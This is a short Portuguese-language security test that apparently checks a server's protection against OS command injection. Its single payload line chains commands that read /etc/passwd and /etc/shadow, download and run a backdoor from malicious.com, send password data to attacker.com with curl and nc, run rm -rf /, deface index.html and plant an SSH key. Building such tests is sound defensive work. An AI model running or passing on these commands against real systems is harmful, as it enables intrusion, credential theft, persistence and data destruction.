Este teste simula uma tentativa de injeção de comandos do sistema operacional que poderiam ser executados no servidor, permitindo acesso não autorizado a arquivos, execução de programas maliciosos ou comprometimento do sistema.
ping -c 1 localhost;cat /etc/passwd;id;uname -a;ls -la;wget http://malicious.com/backdoor -O /tmp/backdoor;chmod +x /tmp/backdoor;/tmp/backdoor && ls -la & echo 'PWNED' & cat /etc/shadow & curl -X POST -d @/etc/passwd https://attacker.com/exfil && cat /etc/passwd | grep -v 'nologin' | awk -F: '{print $1":"$7}' | nc attacker.com 8888 && cd /var/www/html; rm -rf /; echo 'HACKED' > index.html && su admin & echo 'ssh-rsa AAAAB...' >> ~/.ssh/authorized_keys
Este é um teste de segurança para verificar proteções contra ataques de Command Injection. Em um ambiente real, este tipo de requisição seria bloqueado pelo Cloudflare OWASP Core Ruleset.